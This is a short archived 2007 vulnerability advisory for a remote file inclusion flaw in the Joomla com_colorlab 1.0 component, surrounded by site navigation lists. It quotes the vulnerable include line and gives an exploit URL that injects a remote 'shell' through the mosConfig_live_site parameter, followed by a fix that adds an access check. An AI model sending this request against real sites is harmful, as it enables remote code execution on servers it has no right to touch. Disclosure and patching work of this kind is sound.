joomlacolorlab-rfi.txt

joomlacolorlab-rfi.txt: Posted Oct 15, 2007; Authored by XORON; The Joomla com_colorlab component version 1.0 suffers from a remote file inclusion vulnerability.; tags | exploit, remote, code execution, file inclusion; SHA-256 | 4eabdfba40be322a9e55c78ffa023b4b91845a293a9375ee535f704b1f4ef1be; Download | Favorite | View

joomlacolorlab-rfi.txt

--------------------

Joomla com_colorlab Remote File Include

--------------------

Found : xoron

--------------------

Download:
http://download.joomlaportal.ch/content/view/474/

--------------------

Wrong Code:
include( "$mosConfig_live_site/components/com_color/about.html" );

--------------------

Exploit:
/administrator/components/com_color/admin.color.php?mosConfig_live_site=shell?

--------------------

How to Fix:
1-open admin.colo.php
2-write this codes before wrong codes

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

3-save and exit

--------------------

Thanx: mdx :)

--------------------

Top Authors In Last 30 Days

Red Hat 246 files
Ubuntu 54 files
Gentoo 33 files
Debian 23 files
Apple 9 files
malvuln 7 files
Jann Horn 4 files
Ahmet Umit Bayram 4 files
nu11secur1ty 4 files
Google Security Research 4 files

File Archives

Systems

AIX (429)
Apple (2,088)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,048)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,500)
HPUX (880)
iOS (375)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,846)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,952)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,535)
UNIX (9,409)
UnixWare (187)
Windows (6,660)
Other

joomlacolorlab-rfi.txt

joomlacolorlab-rfi.txt

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

joomlacolorlab-rfi.txt

Share This

joomlacolorlab-rfi.txt

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems